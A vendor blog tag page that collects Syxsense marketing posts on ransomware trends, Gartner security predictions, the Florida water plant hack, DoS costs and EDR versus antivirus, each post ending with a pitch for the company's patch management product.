Skip to main content
Tag

cybersecurity

||

3 Ways to Greatly Reduce Cyber Risk

By NewsNo Comments

3 Ways to Greatly Reduce Cyber Risk

With the rise of ransomware and an endless stream of patches in 2021, it takes reliable best practices to reduce your cyber risk exposure.

[vc_empty_space]
[vc_single_image image=”365424″ img_size=”full”]

Report Reveals the Rise of Ransomware and Importance of the Human Element

The Verizon Data Breach Investigations Report is eagerly awaited each year. It provides a window into the world of global trends in security. This year’s analysis looked into 79,635 incidents around the world, of which 5,258 were confirmed data breaches.

Social engineering (primarily phishing) came up as the top avenue of incursion used in breaches. More than 30% of incidents stemmed from it, while web application attacks accounted for around 25% and system intrusions scored almost 20%.

Not surprisingly 85% of breaches included a human element with 61% involving credentials, and 13% containing ransomware. About 10% of the ransomware attacks cost organizations an average of about $1 million – whether from forking over the cash, remediation, or lost revenue.

Ransomware = Organized Crime

Organized crime is now behind four out of five breaches. In other words, the days of the lone hacker-genius-student sitting in an attic breaking into big government systems are behind us. These days, criminals are most often involved and their goal is money – as much as possible per breach. Yes, there is a little espionage going on, and perhaps a few lone wolves showing off their hacking prowess. But by and large, we are now dealing squarely with cybercriminals motivated by money and extortion.

The Verizon report emphasizes how hackers now use automation to quickly zero in on ripe areas.

“It’s important to limit your public facing attack surface, through asset management, defensive boundaries and intelligent patching.”

Another important finding is that it is not new vulnerabilities that cause the most trouble. It is old, unmitigated holes and vulnerabilities that are the most exploited.

“One might think that more recent vulnerabilities would be more common. However, as we saw last year, it is actually the older vulnerabilities that are leading the way. These older vulnerabilities are what the attackers continue to exploit. “

They give the example of the Microsoft Exchange Remote Code Execution Vulnerability (CVE-2021- 26855) that is being actively and massively exploited. Despite Microsoft issuing warning after warning, patches being in existence for months, and a barrage of news stories about this problem, organizations continue to be attacked due to not fixing this issue.

That’s why Verizon analysts condemn the ability of IT teams to keep up with the deployment of patches.

“The patching performance this year in organizations has not been stellar. Granted, it’s never been great.”

How to Greatly Reduce Cyber Risk

Those wishing to greatly reduce cyber risk, therefore, are advised to institute three practices.

  1. Institute security awareness training to educate users into the many tricks and strategies of social engineering. Use this training to proof them up against phishing and other scams.
  2. Automate patch management: Eliminate internal procedures that slow the deployment of patches. Instead of relying on someone in IT to review, test, and determine when and if a patch should be deployed, add automation to the process.
  3. Conduct regular vulnerability scans to detect systems, apps, and devices that offer a potential pathway into the enterprise.

How Syxsense Can Help

Syxsense provides the answer to 2 and 3 above. It combines automated patch management with vulnerability scanning and IT management as a way to eliminate risk and plug the holes cybercriminals are using to institute ransomware and other forms of attack.

[vc_single_image image=”331859″ img_size=”full” css=”.vc_custom_1613682412229{padding-right: 200px !important;padding-left: 200px !important;}”]

Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1586908107967{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
||

Top 5 Security Trends of 2021

By NewsNo Comments

Top 5 Security Trends of 2021

Gartner recently released a list of the top security trends. How have things changed since COVID-19 hit and what actions should you take?

[vc_empty_space]
[vc_single_image image=”365402″ img_size=”full”]

Top IT Security Trends of the Year

Gartner recently released a list of the top security trends. How have these changed since COVID-19 hit? What new trends have emerged? Which old ones remain as persisting challenges?

Here are some of the key ones noted in the report.

1. Staffing

Filling positions with skilled security personnel was a problem long before COVID-19 hit. And it remains a major issue today.

“The first challenge is a skills gap,” said Gartner Analyst Peter Firstbrook. “80% of organizations tell us they have a hard time finding and hiring security professionals and 71% say it’s impacting their ability to deliver security projects within their organizations.”

2. Remote Work

Gartner surveys show that as many as 40% of employees will continue to work from home post-COVID-19. Thus, the additional support and security measures that have been implemented for remote work since March of 2020 will have to be continued indefinitely. Not only that, security personnel will have to deal with some people working only in the office, some only from home, and many combining both.

A further wrinkle is that many offices are taking the opportunity to downsize. One example is an organization of 100 that is planning to have personnel work three days per week in the office. This means that 60 will be onsite at any one time. To address this change, office space is being reduced. Standard cubicles are being dispensed with and employees will be asked to hook up their laptops to available spaces.

Therefore, security staff will have to get used to new patterns of operation, revise policies and best practices, and implement new tools to deal with a more fluid workplace.

3. Identity First Security

Gartner defines identity first security as an approach that places identity front and center in security design. Instead of a disparate set of tools and applications, each with their own security methods, user identity becomes the key to accessing everything from anywhere on any device.

This includes being able to monitor authentication centrally across the enterprise, not just implementing point tools related to multi-factor authentication, single sign-on, or biometric authentication. Organizations will have to evaluate the value of buying new software and systems to implement identity first security against the desire to maximize earlier investments in point tools.

4. Tool Sophistication Grows

Cybercriminals have upped their game. The recent SolarWinds and Microsoft Exchange Server hacks demonstrate the extent and also the depth to which networks can rapidly be compromised.Therefore, security vendors have been forced to raise their game, too, with new technologies such as breach and attack simulation (BAS) tools.

BAS is all about continuously assessing the defensive posture of the organization rather than relying on occasional penetration tests to determine potential areas of exposure. The logic behind this is: why conduct penetration tests on a quarterly or annual basis when you can be doing it virtually all the time?

5. Vendor Consolidation

The modern-day security toolkit contains way too many individual elements. A Gartner survey of CISOs found that 78% have 16 or more cybersecurity tools. Incredibly, as many as 12% of organizations have 46 or more security applications. That’s bad news for IT as they have to integrate, correlate, manage and maintain all those systems. They have had enough of hopping from console to console to fix one issue or another. It is no wonder that mistakes happen and breaches occur.

An emerging element of strategy, therefore, is to consolidate toolkits to encompass a smaller set of vendors. The advantages include ease of implementation, stronger integration, and lowered costs. That’s why 4 out of 5 CISOs intend to consolidate vendors over the next three years.

“Having fewer security solutions can make it easier to properly configure them and respond to alerts, improving your security risk posture,” said Firstbrook.

Enhance Your IT Management and Security

Syxsense Secure is a patch management platform that includes IT management and vulnerability scanning in one console. It not only shows you what’s wrong, but also deploys the solution.

Gain visibility into OS and third-party vulnerabilities like defects, errors, or misconfigurations of components, while increasing cyber resilience with automated patching and security scans.

[vc_single_image image=”331859″ img_size=”full” css=”.vc_custom_1613682412229{padding-right: 200px !important;padding-left: 200px !important;}”]

Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1586908107967{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
||

The Number of Ransomware Victims is Greatly Underreported

By Patch ManagementNo Comments

The Number of Ransomware Victims is Greatly Underreported

It seems hard to believe that ransomware data is underreported. However, reports claim the numbers run far below the actual totals.

[vc_empty_space]
[vc_single_image image=”365395″ img_size=”full”]

Is the number of ransomware victims accurate?

It seems hard to believe that ransomware numbers are underreported. After all, hardly a week goes by without news of another high-profile victim. And most days, there is news of a small business being locked out of its systems.

Yet the eSentire Ransomware Report claims the official numbers run far below the actual totals. The report said that six primary ransomware gangs managed to compromise almost 300 organizations in the first four months of the 2021. Researchers estimate that their haul came to close to $50 million and believe that many more victims pay up and manage to avoid publicity.

Their reasons for keeping quiet vary. Some hope to avoid damage to their brand reputation. Another motivation might be maintenance of share price or seeking to avoid publicity that might endanger massive financial deals about to close.

Ransomware Gang Territories

The report estimates that the various groups involved split the booty between them. They each have a different speciality. Each gang focuses on particular industries and regions of the world, according to the report.

The mob behind the Colonial Pipeline attack is known as DarkSide. In the first six months of their existence, they have managed to impact about 100 organizations. Their business model is that of ransomware-as-a-service. They provide freelancers and contractors with tools to infiltrate corporate defenses and then get a cut of the ransom.

The good news is that increased law enforcement scrutiny caused DarkSide to go shut down and underground, at least temporarily. Energy providers have become something of a specialty for DarkSide, with Brazilian electric utility Companhia Paranaense de Energia also held to ransom this year.

Another growing gang is Ryuk/Conti. It has attacked more than 35 organizations since 2018. 63 of them took place this year. Instead of going after energy and infrastructure, their preference is manufacturing, construction, transportation, education, and local government. Recent victims include Broward County School District, CEE Schisler, and government systems in Georgia, Florida, and Indiana. Three of the local governments paid the ransoms (anywhere from $130,000 to $600,000), but the others did not.

Like the Ryuk/Conti gang, the people behind the Sodin/REvil ransomware focus on healthcare organizations while also devoting their efforts to attacking laptop manufacturers. Of their 161 victims, 52 were hit in 2021 and they made international news with attacks on Acer and Quanta, two of the world’s biggest technology manufacturers.

Stern Warning on Ransomware

The eSentire report include a stern warning:

“Another sobering realization is that no single industry is immune from this ransomware scourge. These debilitating attacks are happening across all regions and all sectors, and it is imperative that all companies and private-sector organizations implement security protections to mitigate the damages stemming from of a ransomware attack.”

That includes ensuring all vital patches have been deployed on every server and endpoint, and that no hidden vulnerabilities exist for hackers to exploit.

How to Prevent Ransomware Attacks

Syxsense Secure is a patch management platform that includes IT management and vulnerability scanning in one console. It not only shows you what’s wrong, but also deploys the solution.

Gain visibility into OS and third-party vulnerabilities like defects, errors, or misconfigurations of components, while increasing cyber resilience with automated patching and security scans.

[vc_single_image image=”331859″ img_size=”full” css=”.vc_custom_1613682412229{padding-right: 200px !important;padding-left: 200px !important;}”]

Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1586908107967{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
||

Would Hamlet Pay a Ransom?

By Patch ManagementNo Comments

Would Hamlet Pay a Ransom?

The FBI strongly advises companies to never pay when ransomware strikes. So why do organizations continue to do so in the face of an attack?

[vc_empty_space]
[vc_single_image image=”365351″ img_size=”full”]

 Would Hamlet Pay a Ransom?

Hamlet once pondered, “To be, or not to be. That is the question.”

If the Prince of Denmark lived in the modern world, he is more likely to be pondering the impact of ransomware on his kingdom and be saying, “To pay, or not to pay. That is the question.”

Government and justice officials are clear about their opinion. The FBI strongly advises companies to never pay a ransom. It is quite possible that the Justice Department will start fining anyone found to have paid over a ransom. Similarly, the UK Home Security has publicly stated that the government doesn’t support victims of ransomware attacks paying the ransom.

Their logic is simple. Paying the bad guys the money just tells them that ransomware is a great way to accumulate cash. Further, who is to say that the cybercriminals will decrypt organizational files once the ransom is paid?

Remember all those movie plot lines where the blackmailer keeps coming back for more and more money? The same thing can and has happened in ransomware attacks. When you are dealing with a criminal, there is never any guarantee that they’ll keep their word.

Another ploy used by the bad guys is to threaten to publicly reveal sensitive or embarrassing data or intellectual property (IP) to the world at large if a large sum is not paid. Even if a ransom is paid, there is still a possibility the criminals will cash in again by quietly passing such data onto a competitor or a journalist – for a fee, of course.

Finally, if hackers have been inside your network, how sure can you be that they haven’t left some form of malware lurking inside. Perhaps a back door, or a way to siphon off money quietly. It is not an easy task to ransack every nook and cranny in the enterprise to find malware and vulnerabilities.

As Hamlet said, “Though this be madness, yet there is method in’t.”

Why Some Pay the Ransom

Colonial Pipeline recently paid almost $5 million. The logic in that action seems clear. It would cost the company far more in potential revenue losses than the ransom demand. Revenue loss is often what motivates payment.

But in local government, healthcare, and education hacks, what drives payment may be something different. The need to restore vital services. Hospitals need access to care for their patients, after all.

Anyone paying a ransom may be subject to government fines. Currently, that is only a threatened action. But with many countries running in heavy deficit, fining organizations for submitting to ransom demands may be seen as another way to fill up the coffers.

How Will the Cybercriminals Respond?

If governments continue the rhetoric about not paying, and fines begin to be issued, more and more organizations will resist the temptation to pay the requested ransom.

The Irish national healthcare service, for example, is currently in a standoff with hackers who have locked it out of many healthcare and social service systems. Ongoing mitigation efforts include shutting down all computer systems, isolating those that were attacked, then wiping, rebuilding and updating all infected devices, updating antivirus and other security apps, and recovering systems using offsite backups.

If refusal to pay becomes a trend, the ball falls into the court of the criminals. How will they respond? In the old days, anyone failing to pay protection money would see their store vandalized, a family member brutalized, or would become the victim of an arson attack. The cyber-equivalent of some of these would seem to be the obvious response. Time will tell.

The best approach, though, is to be vigilant in doing everything you can to prevent the possibility of a ransomware attack. Patch all systems, keep an eagle eye for potential vulnerabilities, and act whenever one is found.

As Hamlet said, and he might even have been talking about cybercriminals, “Let the doors be shut upon him, that he may play the fool nowhere but in’s own house.”

Find out more about Syxsense, the only tool that combines automated patch management, vulnerability scanning, and IT management.

[vc_single_image image=”331859″ img_size=”full” css=”.vc_custom_1613682412229{padding-right: 200px !important;padding-left: 200px !important;}”]

Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1586908107967{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
||

How Syxsense Would Respond to the Florida Water Poisoning Attack

By BlogNo Comments

How Syxsense Would Respond to the Florida Water Poisoning Attack

After the attempted water poisoning cyberattack in Florida, cybersecurity experts are advising IT departments to take action.

[vc_empty_space]
[vc_single_image image=”364629″ img_size=”full”]

Hackers Attempt Poisoning in Florida

Last week an unidentified attacker gained access to a water treatment plant’s network and modified chemical dosages to dangerous levels.

The FBI has issued an alert on Tuesday, raising attention to three security issues that have been seen on the plant’s network following last week’s hack. In these cases, the FBI recommends a series of basic security best practices as an intermediary way to mitigate threats.

Using Syxsense Secure, you can verify your governance against these FBI recommendations, along with resolving any issues discovered as part of this vulnerability scanning exercise.

Rob Brown, Chief Customer Success Officer at Syxsense said, “Obsolete software or unpatched devices provide one of the most serious concerns to the Security Chiefs of companies worldwide. Many of our customers are saying the unpatched laptop may become the next big weaponized threat. They are using Syxsense Secure with the hyper-automation of Syxsense Cortex to return their users safely to the office or isolate those devices if they are unsafe.”

The FBI Recommendations

1. Use multi-factor authentication

Syxsense Manage and Syxsense Secure can be enabled with multi-factor (two-factor) authentication. Syxsense supports both email and an Authenticator app, such as Google and DUO.

In addition, other security settings are enabled by default such as email notifications upon login to the console and auto logout following a period of inactivity. Whitelisting is an option for anyone using static IP address, and geographical protection can be enabled to restrict access to your Syxsense console based on country.

2. Use strong passwords to protect Remote Desktop Protocol (RDP) credentials

With Syxsense Cortex, you can discover all systems with Remote Desktop Protocol enabled without the required “strong passwords”. Syxsense Cortex can detect and notify through email any systems which do not meet this requirement.

3. Ensure anti-virus, spam filters, and firewalls are up to date, properly configured, and secure

The Syxsense Secure vulnerability scanner can provide an independent audit to the health and status of the most popular anti-virus and anti-spyware programs, and where needed, update those system automatically to protect the devices.

4. Audit network configurations and isolate computer systems that cannot be updated

Based on the detected vulnerable status of devices, Syxsense Cortex can automatically quarantine the device, isolating it from the network and preventing the device from being a threat.

The device can still be managed using Syxsense Secure, meaning you can still perform software deployment, patch management, vulnerability management or remote access whilst isolated.

5. Audit your network for systems using RDP, closing unused RDP ports, applying two-factor authentication wherever possible, and logging RDP login attempts

There are many types of ports scanned using Syxsense Secure. Based on those detected, you can report on the devices or take action such as enabling local firewalls or reconfiguring the operating system using Windows Powershell.

6. Audit logs for all remote connection protocols

Syxsense Secure provides real-time access to the Windows Application, Event, System and Security event logs.

7. Train users to identify and report attempts at social engineering

From customizing different computer desktop backgrounds, to customizable end user message prompts; Syxsense Secure and Syxsense Cortex can help users thwart mistakes made at the endpoint. All tasks performed by Syxsense can use a corporate logo and custom messages.

8. Identify and suspend access of users exhibiting unusual activity

Untrusted applications, processes, or multiple login attempts can disable local accounts automatically and provide email alerts to automated helpdesk systems. Syxsense Secure comes with a built-in alerting system so that you can never miss them.

9. Keep software updated

Syxsense boasts to support both Windows, Mac OS, Linux and the most common third party applications.

Whether your devices are local, remote, or at home, you can trust Syxsense to update your software or notify you when obsolete software has been found.

[vc_single_image image=”364560″ img_size=”full”]

Experience the power of Syxsense Cortex, free for 14 days.

Syxsense Cortex is included with Syxsense Secure. Our intuitive technology helps you easily predict and remove security threats where you are most vulnerable — at the endpoint.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1586908107967{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
|COVID-19 Cyberattacks|||Europol Statement on COVID-19 Cybersecurity||

COVID-19 Causes Increase in Cyberattacks

By NewsNo Comments

COVID-19 Causes Increase in Cyberattacks

As the world continues to face COVID-19 and cyberattacks increase, patch management and endpoint security are becoming more challenging for businesses and IT professionals.

[vc_empty_space]
[vc_single_image image=”38975″ img_size=”full”]

Coronavirus is Leading to Growth in Cyber Attacks

As the world continues to battle COVID-19, patching and securing endpoints has become a much bigger challenge for businesses.

A recent survey from Threatpost revealed that 40% of companies reported seeing increased cyberattacks as they enable remote working.

In a joint statement from the European Commission, ENISA, CERT-EU, the organizations shared concerns about COVID-19 related vulnerabilities.

The coronavirus outbreak has spurred widespread anxiety and forced many people to work from home. Malign actors are actively exploiting these new challenging circumstances to target remote workers, businesses and individuals alike.

Relevant European Union entities are in close contact with one another to track these malicious activities, raise awareness in their respective communities and help protect confined citizens. The European Commission, ENISA, CERT-EU and Europol, among others, will continue to monitor the situation and coordinate as appropriate to ensure a safer cyberspace for the EU and the world.

Despite this call-to-action, many businesses and IT professionals are still unequipped to handle the exploits. Companies are making infrastructure changes on the fly and opening up corporate networks to potential attacks.

[vc_single_image image=”38151″ img_size=”full” onclick=”custom_link” link=”https://syxsense.com/start-a-free-trial-of-syxsense”]

Proactively Protecting Your Organization

A secure, roaming product like Syxsense allows you to manage and secure vulnerabilities exposed by open ports, disabled firewalls, ineffective user account policies, and security compliance violations from remote workers.

In this unpredictable time, detecting software vulnerabilities isn’t enough. Traditional security scanners only do half the job by identifying and tracking possible vulnerabilities and exposure without eliminating the risk.

Combining security scanning and patch management in a single console, our vulnerability scanning feature not only shows you what’s wrong, but also deploys the solution. Gain visibility into OS and third-party vulnerabilities while increasing cyber resilience through automated patching and security scans. Insights into the OS misconfigurations and compliance violations reduce your attack surface and increase peace of mind.

[vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fsyxsense-trial|||” css=”.vc_custom_1572936982710{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
||||||Quote About Cybersecurity Tools in 2020

The True Cost of DoS Attacks

By Patch ManagementNo Comments

The True Cost of DoS Attacks

There's a high price to pay for DoS attacks in 2020. With costs rapidly rising, what is the best IT security strategy?
[vc_empty_space]
[vc_single_image image=”38085″ img_size=”full”]

A Denial of Service (DoS) attack can seriously derail any business with a digital presence. These attacks are still prevalent in 2020 and the cost is rapidly rising. Even a small company could lose up to $120,000 after experiencing its effects.

According to a report from Bulletproof, the price tag on a DoS attack has risen to over $2 million for enterprise companies. Defending against these threats can actively save your business money and time.

Although some instances reflect the lowering of DoS ransoms, cyber attackers are easily generating a greater impact with new strategies. As a result, budgeting for the best tools to shield your business from these attacks delivers much more upside.

The most direct result of a DoS attacks is lost sales. However, DoS attacks can also be used to hide more damaging breaches of data. If sensitive customer information or financial data is lost, you may also be legally liable, which significantly increases the price of the breach.

Other indirect costs of an attacks include replacing hardware, but also employee time. Many won’t be able to work until service is back, and others who can help fix the problem will need to work extra overtime. You may need to hire outside help if the attack persists, and customer service people will be inundated with more calls and emails than normal.

[vc_single_image image=”38089″ img_size=”full”]

The Best Cybersecurity Strategy for 2020

What are the best protections for DoS? Internal IT employees should ensure that all servers are only publicly available for necessary functions, and when further secured with SSH, firewalls on all endpoints, SSL, and VPNs. Plan ahead for larger traffic accommodations than you think you need and employ a smart array of vulnerability testing technology to keep uptime at 100%.

Syxsense can inspect your company’s resources on a strict schedule and will patch software and hardware in real-time to automatically protect against zero-day vulnerabilities. An inclusive approach encompassing the OS, third-party apps, firewalls, router configurations, and more ensures vigilance against all attack vectors.

Robert Brown, Director of Services at Syxsense, notes that this comprehensive patching effort is required if companies want to deflect DoS cost-effectively.

“When every minute of downtime carries a five-figure price tag, patch management moves higher on the list of priorities for businesses in 2020,” Brown said.

Syxsense allows you to manage and secure vulnerabilities exposed by open ports, disabled firewalls, ineffective user account policies, and security compliance violations from remote workers. Gain visibility into OS and third-party vulnerabilities while increasing cyber resilience through automated patch management and vulnerability scanning.

[vc_separator css=”.vc_custom_1551288486254{padding-top: 20px !important;padding-bottom: 20px !important;}”]

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

[vc_btn title=”Start Your Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:%2Fstart-a-free-trial-of-syxsense|||”]
|Why You Should Manage Your Endpoints|

Why You Need to Manage Your Endpoints

By Patch ManagementNo Comments

Why You Need to Manage Your Endpoints

Endpoint management is imperative today for business of all sizes. With EPP and EDR solutions available, which is the best option for your organization?

[vc_empty_space]
[vc_single_image image=”37189″ img_size=”full”]

Endpoint Management is More Critical than Ever

Not every security or IT team has a confident endpoint management strategy. A recent survey of 1,000 IT professionals found that, while 88 percent of respondents acknowledged the importance of endpoint management, nearly a third didn’t know how many endpoint devices existed within their organization.

An endpoint is simply an Internet-capable hardware device on a TCP/IP network. The term can refer to desktop computers, laptops, smart phones, tablets, thin clients, printers, or other specialized hardware, such POS terminals, smart meters, AC control systems, thermometers, and the like. The connection of these devices to corporate networks creates attack paths for security threats. It stands to reason, then, that endpoint security is imperative today for business of all sizes.

EPP vs. EDR Solutions

 So, how can IT and security teams go about this? It starts with the overall concept of endpoint management: the ability to centrally discover, provision, deploy, update, and troubleshoot endpoint devices within an organization.

Such security tends to be split into two categories—albeit categories that are converging: Endpoint Protection Platforms (EPP) and Endpoint Detection & Response (EDR).

EPP is a solution deployed on endpoint devices to prevent file-based malware attacks, detect malicious activity, and provide the investigation and remediation capabilities needed to respond to dynamic security incidents and alerts.

According to Cybrary, EPP is designed to detect and block threats at the device level. To achieve this, EPP tools contain other security solutions such as:

  • Antivirus
  • Anti-malware
  • Data encryption
  • Personal firewalls
  • Intrusion prevention (IPS)
  • Data loss prevention (DLP)

Traditional EPP solutions are preventative by nature, and typically use a signature-based approach to identify threats. The latest EPP solutions have, however, evolved to utilize a broader range of detection techniques.

[vc_single_image image=”36938″ img_size=”full”]

Antivirus Software Isn’t Enough

On the other hand, says Cybrary, “EDR tools are designed to monitor and record activity on endpoints, detect suspicious behavior, security risks, and respond to internal and external threats. You can use EDR solutions to track, monitor, and analyze data on endpoints to enhance the fortification of your environment.”

The article goes on to explain that EDR tools do not replace traditional tools such as antivirus and firewalls but, instead, work with them to provide enhanced security capabilities. Since these tools protect endpoints, they can be considered a part of a broader endpoint management concept.

“In other words,” according to Cybrary, “antivirus software only protects end-user devices while EDR provides network security by authenticating log-ins, monitoring network activities, and deploying updates.”

While the capabilities of EDR solutions can vary, they all share the same primary purpose; alerting the user of suspicious activity and investigating threats in real-time to study the root of the attack and stop it.

It might seem like the distinction between EPP and EDR is straightforward, but it is not always that simple. Traditionally, EPP is thought of as a first-line defense mechanism, effective at blocking known threats. EDR, on the other hand, is seen as the next layer of security, providing additional tools to detect threats, analyze intrusions, and respond to attacks.

The Benefits of EDR Solutions

 EDR solutions tend to have four primary competencies: detect security incidents; contain the incident at the endpoint so network traffic or process execution can be remotely controlled; investigate security incidents; and remediate endpoints to a pre-infection state. Innovation, in the form of artificial intelligence (AI), allows EDR solutions to predict threats before they occur, in addition to the four competencies focused on detecting and eliminating threats.

EDR was initially positioned as a solution for large organizations with dedicated cybersecurity centers that can use the inputs provided by EDR to fight intrusion to their network. Now there is a growing acceptance that EDR capabilities are a necessity for all organizations of all sizes.

Of late, according to Cybrary, EDR providers have begun to incorporate aspects of EPPs into their products, and EPP providers to integrate basic EDR functionality in their solutions as well. Some companies are even now offering a more holistic security solution that combines EDR security and EPP security tools to provide both active and passive endpoint protection.

How Syxsense Can Help

Today, organizations have realized that the two solutions complement each other. Syxsense is one of those companies. As cybersecurity threats grow, there is more pressure than ever to stay ahead of the curve.

Syxsense Secure brings together endpoint management and security for greater efficiency and collaboration between IT management and security teams. Our AI-driven threat protection gets you in front of any malicious cyberattack with the power of predictive technology.

[vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fsyxsense-trial|||” css=”.vc_custom_1572936982710{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
|||

Endpoint Security vs. Antivirus

By Patch ManagementNo Comments

Antivirus Software is Nice, But It’s Not Enough for Full Endpoint Security

Are your current security measures enough to protect your network’s endpoints? Explore the key differences between antivirus software and EDR tools.

[vc_empty_space]
[vc_single_image image=”36933″ img_size=”full” css_animation=”fadeIn”]

As we previously pointed out in our “Endpoint Security 2020: What Your Need to Know” article: “Cyberattacks are growing more complex and difficult to prevent, and this will only accelerate in the future, thus making endpoint security a top goal in 2020.” Given the news of late, there can be no doubting the importance of this..

You probably already have information-security measures in place in your organization, such as firewalls and antivirus software. But you might be wondering if what you have in place is sufficient to properly protect all of your network’s endpoints.

Unfortunately, the question—and answers—might not be that simple. As pointed out by SolutionsReview, it’s important to understand the historical significance of antivirus software. Such tools—the origins of which date back more than 30 years—represent the wellspring from which other, more sophisticated, cybersecurity tools and techniques would emerges.

The late 1980s and early 1990s marked the debut of antivirus products from developers such as Symantec, McAfee and Sophos, in addition to the founding of cybersecurity research groups such as the Computer Antivirus Research Organization.

Now, three decades later, antivirus tools are part of standard operating procedure for virtually all professional-grade desktops and laptops—as well as a considerable number of the smartphones and tablets used by enterprise staff. Plenty of consumers also use such applications.

The Inherent Limits of Antivirus Control

In the majority cases, antivirus software exists in the background, only showing its presence when a threat is detected. While certainly valuable, there is a clear limitation to antivirus software: it only functions as a defensive measure when an active threat has made itself known. It does not have much in the way of counteroffensive tools, nor does it have the broader scope of functionality available through endpoint detection and response (EDR) tools.

Additionally, many legacy antivirus programs—and even some of the more recent versions—are all too often limited to detecting the presence of signature-based cyberthreats. While a significant number of the well-known malware and exploit tools used by modern hackers have signatures embedded in their code that an up-to-date antivirus platform can identify, there are also plenty that haven’t had their signatures cataloged yet. Malware that lacks signatures altogether is also becoming increasingly common, according to TechTarget.

Perhaps most alarming of all is that many cyberattacks today eschew files entirely. Instead, they use innocuous-looking links to trigger garden-variety programs such as Flash and Windows PowerShell, the latter of which can be compromised through remote manipulation of the command line with relative ease.

As CSO explained, these collect data from the victimized machine and relay it to the hacker who originated the attack, allowing that interloper to seize further control of a device and subsequently deliver more exploits. An entire network could be devastated this way, and many antivirus tools would most likely have never seen it coming.

The Ponemon Institute’s 2018 State of Endpoint Security Report noted that 35% of that year’s malware attacks were fileless, while projecting that figure to increase to 38% for 2019. In the years to come, it’s entirely possible that fileless exploits will constitute a significant majority of the cyberattacks deployed against all businesses and public-sector organizations, leaving antivirus tools even more in the lurch.

[vc_single_image image=”36938″ img_size=”full” css_animation=”fadeIn”]

Moving Ahead to Endpoint Protection

Back in 2015, in a guest blog post for Politico, engineer and futurist David Evans estimated that about 127 new endpoints were being added to the internet of things every second, all over the world. More recently, Gartner projected that IoT growth had reached the point at which there would be approximately 5.8 billion endpoints in the global enterprise and automotive markets alone by the end of 2020, marking 21% growth from the previous year.

According to the SANS study “Understanding the (True) Cost of Endpoint Management,” 61% of the respondents said their organizations had more than 1,000 user endpoints, while 5% claimed to have 100,000 or more. And the risk to small businesses is no less real and significant than that facing medium-sized and enterprise-level companies. Per Verizon’s Mobile Security Index 2019, 88% of firms with 500 or fewer workers acknowledged that endpoint security was a serious hazard to their operations, and that it will only get worse.

EDR to the Rescue

EDR solutions emerged as a means of addressing the security issues created by increase in endpoints, IoT-relate or not. They are deployed according to the software-as-a-service model. Rather than continuously scanning the network and its various interconnected viruses for clear signatures of malware, EDR tools monitor user behaviors, looking for actions and operations that are out of the ordinary. This is sometimes referred to as “suspicious activity validation.”

The best EDR tools perform all of the classic functions of their cybersecurity predecessors, but leverage new methods to do so, including the use of artificial intelligence and machine learning. Furthermore, they are not limited to checking for conventional signatures to look for signs of potential malware intrusions; they also examine URLs, IP addresses, file hashes, and other data points.

How EDR from Syxsense Keeps you Protected

